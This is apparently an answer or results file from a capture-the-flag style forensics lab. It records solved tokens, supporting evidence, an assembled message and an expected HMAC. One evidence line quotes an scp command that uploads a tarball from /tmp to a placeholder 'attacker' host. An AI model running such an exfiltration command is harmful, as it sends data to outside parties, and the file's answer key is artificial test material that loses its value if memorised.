TOKEN[KEYPAD]=23252
EVIDENCE[KEYPAD].TOP24=198.18.0.0/24
EVIDENCE[KEYPAD].COUNT=52
EVIDENCE[KEYPAD].SAMPLE=2025-08-09T12:00:01Z lab1 sshd[2713]: Failed password for admin from 198.18.0.173 port 48554 protocol 2
EVIDENCE[KEYPAD].MALFORMED_SKIPPED=3
TOKEN[DNS]=vista
EVIDENCE[DNS].KEY=hint1
EVIDENCE[DNS].DECODED_LINE=The code is not in the roots but near the vista
TOKEN[SAFE]=18-18-36
EVIDENCE[SAFE].MATCH=SAFE{18-18-36}
EVIDENCE[SAFE].CHECK=18+18=36
TOKEN[PID]=146
EVIDENCE[PID].PATH=[138->141->142->146]
EVIDENCE[PID].CMD="scp /tmp/x.tgz attacker@198.51.100.33:/upload"
FINAL_GATE=PENDING
MSG=msc-group-04|23252-146-18-18-36-vista
EXPECTED_HMAC=771360e51a90a21d66c78cf6188890df689ddefa8d02432b9387ffb07c723daa